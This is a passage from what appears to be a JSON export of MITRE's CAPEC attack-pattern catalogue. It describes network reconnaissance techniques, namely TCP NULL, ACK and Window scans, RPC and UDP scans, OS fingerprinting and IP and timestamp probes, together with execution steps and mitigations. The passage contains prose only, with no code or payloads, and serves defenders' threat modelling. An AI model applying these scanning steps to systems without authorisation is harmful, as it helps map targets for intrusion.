Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Notes"}]}},"304":{"ID":"304","Name":"TCP Null Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a TCP NULL scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with no flags in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to being fast, the major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to \'build\' a connection. NULL packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, NULL scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, NULL scans are flagged by almost all intrusion prevention or intrusion detection systems.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with no flags set and that are not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If no response is received the port is open. If a RST packet is received then the port is closed."}]},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network. NULL scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack can be carried out via a network mapper/scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Employ a robust network defensive posture that includes a managed IDS/IPS."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["Many operating systems do not implement RFC 793 exactly and for this reason NULL scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing the adversary from distinguishing between open and closed ports. NULL scans are limited by the range of platforms against which they work.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Mitigations, Notes"}]}},"305":{"ID":"305","Name":"TCP ACK Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, gives a more complete picture of the type of firewall rules that are present. When a TCP ACK segment is sent to a closed port, or sent out-of-sync to a listening port, the RFC 793 expected behavior is for the device to respond with a RST. Getting RSTs back in response to a ACK scan gives the attacker useful information that can be used to infer the type of firewall present. Stateful firewalls will discard out-of-sync ACK packets, leading to no response. When this occurs the port is marked as filtered. When RSTs are received in response, the ports are marked as unfiltered, as the ACK packets solicited the expected behavior from a port. When combined with SYN techniques an attacker can gain a more complete picture of which types of packets get through to a host and thereby map out its firewall rule-set. ACK scanning, when combined with SYN scanning, also allows the adversary to analyze whether a firewall is stateful or non-stateful (described in notes). TCP ACK Scans are somewhat faster and more stealthy than other types of scans but often requires rather sophisticated analysis by an experienced person. A skilled adversary may use this method to map out firewall rules, but the results of ACK scanning will be less useful to a novice.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with the ACK flag set and that are not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If a RST packet is received the target port is either closed or the ACK was sent out-of-sync. If no response is received, the target is likely using a stateful firewall."}]},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network. ACK scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55-56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.7 TCP ACK Scan, pg. 113"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["If a SYN solicits a SYN/ACK or a RST and an ACK solicits a RST, the port is unfiltered by any firewall type. If a SYN solicits a SYN/ACK, but an ACK generates no response, the port is statefully filtered. When a SYN generates neither a SYN/ACK or a RST, but an ACK generates a RST, the port is statefully filtered. When neither SYN nor ACK generates any response, the port is blocked by a specific firewall rule, which can occur via any type of firewall.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Notes"}]}},"306":{"ID":"306","Name":"TCP Window Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary engages in TCP Window scanning to analyze port status and operating system type. TCP Window scanning uses the ACK scanning method but examine the TCP Window Size field of response RST packets to make certain inferences. While TCP Window Scans are fast and relatively stealthy, they work against fewer TCP stack implementations than any other type of scan. Some operating systems return a positive TCP window size when a RST packet is sent from an open port, and a negative value when the RST originates from a closed port. TCP Window scanning is one of the most complex scan types, and its results are difficult to interpret. Window scanning alone rarely yields useful information, but when combined with other types of scanning is more useful. It is a generally more reliable means of making inference about operating system versions than port status.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with the ACK flag set and that are not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. Specifically, the adversary views the TCP window size from the returned RST packet if one was received. Depending on the target operating system, a positive window size may indicate an open port while a negative window size may indicate a closed port."}]},"Prerequisites":{"Prerequisite":"TCP Window scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"The ability to send TCP segments with a custom window size to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55-56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.8 TCP Window Scan, pg. 115"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"307":{"ID":"307","Name":"TCP RPC Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary scans for RPC services listing on a Unix/Linux host. This type of scan can be obtained via native operating system utilities or via port scanners like nmap. When performed by a scanner, an RPC datagram is sent to a list of UDP ports and the response is recorded. Particular types of responses can be indicative of well-known RPC services running on a UDP port. Direct RPC scans that bypass portmapper/sunrpc are typically slow compare to other scan types, are easily detected by IPS/IDS systems, and can only detect open ports when an RPC service responds. ICMP diagnostic message responses can help identify closed ports, however filtered and unfiltered ports cannot be identified through TCP RPC scans. There are two general approaches to RPC scanning: One is to use a native operating system utility, or script, to query the portmapper/rpcbind application running on port 111. Portmapper will return a list of registered RPC services. Alternately, one can use a port scanner or script to scan for RPC services directly. Discovering RPC services gives the attacker potential targets to attack, as some RPC services are insecure by default.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends RCP packets to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine which, if any, RPC service is running on that port. Responses will vary based on which RPC service is running."}]},"Prerequisites":{"Prerequisite":"RPC scanning requires no special privileges when it is performed via a native system utility."},"Resources_Required":{"Resource":"The ability to craft custom RPC datagrams for use during network reconnaissance via native OS utilities or a port scanning tool. By tailoring the bytes injected one can scan for specific RPC-registered services. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Typically, an IDS/IPS system is very effective against this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-34","Section":"Section 7.5.2 RPC Grinding, pg. 156"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"308":{"ID":"308","Name":"UDP Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port. During a UDP scan, a datagram is sent to a target port. If an \'ICMP Type 3 Port unreachable\' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends UDP packets to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. Whether a port responds to a UDP packet is dependant on what application is listening on that port. No response does not indicate the port is not open."}]},"Prerequisites":{"Prerequisite":"The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply."},"Resources_Required":{"Resource":"The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":["Firewalls or ACLs which block egress ICMP error types effectively prevent UDP scans from returning any useful information.","UDP scanning is complicated by rate limiting mechanisms governing ICMP error messages."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 54-69"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-34","Section":"Section 5.4 RPC Grinding, pg. 101"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"309":{"ID":"309","Name":"Network Topology Mapping","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}},{"Nature":"CanPrecede","CAPEC_ID":"664"}]},"Prerequisites":{"Prerequisite":"None"},"Resources_Required":{"Resource":"Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1016","Entry_Name":"System Network Configuration Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"310":{"ID":"310","Name":"Scanning for Vulnerable Software","Abstraction":"Detailed","Status":"Draft","Description":"An attacker engages in scanning activity to find vulnerable software versions or types, such as operating system versions or network services. Vulnerable or exploitable network configurations, such as improperly firewalled systems, or misconfigured systems in the DMZ or external network, provide windows of opportunity for an attacker. Common types of vulnerable software include unpatched operating systems or services (e.g FTP, Telnet, SMTP, SNMP) running on open ports that the attacker has identified. Attackers usually begin probing for vulnerable software once the external network has been port scanned and potential targets have been revealed.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"541"}},"Prerequisites":{"Prerequisite":["Access to the network on which the targeted system resides.","Software tools used to probe systems over a range of ports and protocols."]},"Skills_Required":{"Skill":["To probe a system remotely without detection requires careful planning and patience.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"312":{"ID":"312","Name":"Active OS Fingerprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary engages in activity to detect the operating system or firmware version of a remote target by interrogating a device, server, or platform with a probe designed to solicit behavior that will reveal information about the operating systems or firmware in the environment. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to \'break\' compatibility with the protocol the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to the anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"224"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":{"p":["Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.","A tool capable of sending and receiving packets from a remote system."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Hide Activities"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1082","Entry_Name":"System Information Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"313":{"ID":"313","Name":"Passive OS Fingerprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary engages in activity to detect the version or type of OS software in a an environment by passively monitoring communication between devices, nodes, or applications. Passive techniques for operating system detection send no actual probes to a target, but monitor network or client-server communication between nodes in order to identify operating systems based on observed behavior as compared to a database of known signatures or values. While passive OS fingerprinting is not usually as reliable as active methods, it is generally better able to evade detection.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"224"}},"Prerequisites":{"Prerequisite":"The ability to monitor network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"Any tool capable of monitoring network communications, like a packet sniffer (e.g., Wireshark)"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Hide Activities"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"317":{"ID":"317","Name":"IP ID Sequencing Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe analyzes the IP \'ID\' field sequence number generation algorithm of a remote host. Operating systems generate IP \'ID\' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP \'ID\' sequence number analysis - IP \'ID\' Sequencing: analyzing the IP \'ID\' sequence generation algorithm for one protocol used by a host and Shared IP \'ID\' Sequencing: analyzing the packet ordering via IP \'ID\' values spanning multiple protocols, such as between ICMP and TCP.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses"}]}},"318":{"ID":"318","Name":"IP \'ID\' Echoed Byte-Order Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe tests to determine if the remote host echoes back the IP \'ID\' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP \'ID\' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"319":{"ID":"319","Name":"IP (DF) \'Don\'t Fragment Bit\' Echoing Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe tests to determine if the remote host echoes back the IP \'DF\' (Don\'t Fragment) bit in a response packet. An attacker sends a UDP datagram with the DF bit set to a closed port on the remote host to observe whether the \'DF\' bit is set in the response packet. Some operating systems will echo the bit in the ICMP error message while others will zero out the bit in the response packet.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"320":{"ID":"320","Name":"TCP Timestamp Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe examines the remote server\'s implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine if timestamps are present.] The adversary sends a probe packet to the remote host to identify if timestamps are present."},{"Step":"2","Phase":"Experiment","Description":"[Record and analyze timestamp values.] If the remote host is using timestamp, obtain several timestamps, analyze them and compare them to known values.","Technique":["The adversary sends several requests and records the timestamp values.","The adversary analyzes the timestamp values and determines an average increments per second in the timestamps for the target.","The adversary compares this result to a database of known TCP timestamp increments for a possible match."]}]},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint."},"Resources_Required":{"Resource":{"p":["Any type of active probing that involves 